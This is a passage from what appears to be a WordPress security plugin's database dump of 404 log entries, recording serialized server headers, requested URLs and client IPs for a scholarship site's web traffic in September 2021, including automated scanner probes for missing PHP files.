Firefox/67.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631656188.6822679042816162109375;s:12:\"REQUEST_TIME\";i:1631656188;}}','notice','2021-09-14 21:49:50','2021-09-14 21:49:48',72646560,72731192,'https://zphiblgz.org/wp-cache.php',1,0,'185.191.34.215'),(97105,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631749779.308928012847900390625;s:12:\"REQUEST_TIME\";i:1631749779;}}','notice','2021-09-15 23:49:41','2021-09-15 23:49:39',72665688,72766504,'https://zphiblgz.org/system/logs/seo_script.php',1,0,'185.191.34.215'),(97106,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"29\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631755564.153667926788330078125;s:12:\"REQUEST_TIME\";i:1631755564;}}','notice','2021-09-16 01:26:06','2021-09-16 01:26:04',72646480,72731096,'https://zphiblgz.org/bps.php',1,0,'185.191.34.215'),(97137,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821023.5300118923187255859375;s:12:\"REQUEST_TIME\";i:1631821023;}}','notice','2021-09-16 19:37:05','2021-09-16 19:37:03',72606376,72690248,'http://zphiblgz.org/user/Login',1,0,'101.36.110.241'),(97138,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821059.588035106658935546875;s:12:\"REQUEST_TIME\";i:1631821059;}}','notice','2021-09-16 19:37:41','2021-09-16 19:37:39',72643096,72743304,'http://zphiblgz.org/home/main/login',1,0,'101.36.110.241'),(97139,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821071.889965057373046875;s:12:\"REQUEST_TIME\";i:1631821071;}}','notice','2021-09-16 19:37:52','2021-09-16 19:37:52',72350144,72450344,'http://zphiblgz.org/Home/Index/ajaxTJ',1,0,'101.36.110.241'),(97140,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821071.50708103179931640625;s:12:\"REQUEST_TIME\";i:1631821071;}}','notice','2021-09-16 19:37:53','2021-09-16 19:37:51',72643112,72743312,'http://zphiblgz.org/Home/Bind/binding',1,0,'101.36.110.241'),(97141,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821077.2131168842315673828125;s:12:\"REQUEST_TIME\";i:1631821077;}}','notice','2021-09-16 19:37:58','2021-09-16 19:37:57',72313528,72397384,'http://zphiblgz.org/user/allroleinfo',1,0,'101.36.110.241'),(97142,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821076.816379070281982421875;s:12:\"REQUEST_TIME\";i:1631821076;}}','notice','2021-09-16 19:37:58','2021-09-16 19:37:57',72606496,72690352,'http://zphiblgz.org/Public/initJs.php',1,0,'101.36.110.241'),(97143,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821082.396790981292724609375;s:12:\"REQUEST_TIME\";i:1631821082;}}','notice','2021-09-16 19:38:04','2021-09-16 19:38:02',72606504,72690360,'http://zphiblgz.org/api/content_bottom',1,0,'101.36.110.241'),(97144,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821087.2602479457855224609375;s:12:\"REQUEST_TIME\";i:1631821087;}}','notice','2021-09-16 19:38:09','2021-09-16 19:38:07',72606504,72690360,'http://zphiblgz.org/Home/GetInitSource',1,0,'101.36.110.241'),(97145,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:2:\"12\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:16:\"www.zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821090.8670399188995361328125;s:12:\"REQUEST_TIME\";i:1631821090;}}','notice','2021-09-16 19:38:12','2021-09-16 19:38:11',72683376,72784944,'http://www.zphiblgz.org/wap/banner/details',1,0,'101.36.110.241'),(97146,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821103.5374729633331298828125;s:12:\"REQUEST_TIME\";i:1631821103;}}','notice','2021-09-16 19:38:25','2021-09-16 19:38:23',72643112,72743312,'http://zphiblgz.org/api/message/webInfo',1,0,'101.36.110.241'),(97147,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:16:\"www.zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821106.571712970733642578125;s:12:\"REQUEST_TIME\";i:1631821106;}}','notice','2021-09-16 19:38:27','2021-09-16 19:38:26',72345816,72447384,'http://www.zphiblgz.org/api/v1/borrowxx.html',1,0,'101.36.110.241'),(96949,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:11:\"HTTP_ACCEPT\";s:99:\"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.3\";s:19:\"HTTP_ACCEPT_CHARSET\";s:32:\"utf-8,windows-1251;q=0.7,*;q=0.5\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-us,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2805.26 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631283963.87024402618408203125;s:12:\"REQUEST_TIME\";i:1631283963;}}','notice','2021-09-10 14:26:06','2021-09-10 14:26:04',72756080,72839736,'http://zphiblgz.org/old-index.php?daksldlkdsadas=1',1,0,'185.217.198.183'),(96948,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:56:\"image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:101:\"Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8\";s:8:\"HTTP_VIA\";s:68:\"http/1.0 localhost.localdomain[DE4ACAF5] (ApacheTrafficServer/3.2.2)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"212.3.142.113\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631276282.9838120937347412109375;s:12:\"REQUEST_TIME\";i:1631276282;}}','notice','2021-09-10 12:18:05','2021-09-10 12:18:03',72628648,72712384,'http://zphiblgz.org/scholarship/application/',1,0,'212.3.142.113'),(96947,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631275189.8879249095916748046875;s:12:\"REQUEST_TIME\";i:1631275189;}}','notice','2021-09-10 11:59:51','2021-09-10 11:59:50',72175584,72274880,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'207.46.13.27'),(96946,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"27\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631274769.4343969821929931640625;s:12:\"REQUEST_TIME\";i:1631274769;}}','notice','2021-09-10 11:52:51','2021-09-10 11:52:49',72651680,72736304,'https://zphiblgz.org/cache/accesson.php',1,0,'185.191.34.215'),(96945,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 Edg/83.0.478.37\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631273887.5301630496978759765625;s:12:\"REQUEST_TIME\";i:1631273887;}}','notice','2021-09-10 11:38:09','2021-09-10 11:38:07',72622048,72705784,'http://zphiblgz.org/scholarship/application/',1,0,'196.240.54.121'),(96944,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.0 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631273255.9196960926055908203125;s:12:\"REQUEST_TIME\";i:1631273255;}}','notice','2021-09-10 11:27:38','2021-09-10 11:27:36',72690456,72774192,'http://zphiblgz.org/scholarship/application/',1,0,'47.74.152.79'),(96943,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631271876.0495569705963134765625;s:12:\"REQUEST_TIME\";i:1631271876;}}','notice','2021-09-10 11:04:38','2021-09-10 11:04:36',72603912,72687648,'http://zphiblgz.org/scholarship/application/',1,0,'193.9.114.179'),(96942,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631270267.8339750766754150390625;s:12:\"REQUEST_TIME\";i:1631270267;}}','notice','2021-09-10 10:37:49','2021-09-10 10:37:48',72649312,72748712,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'147.78.141.191'),(96941,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 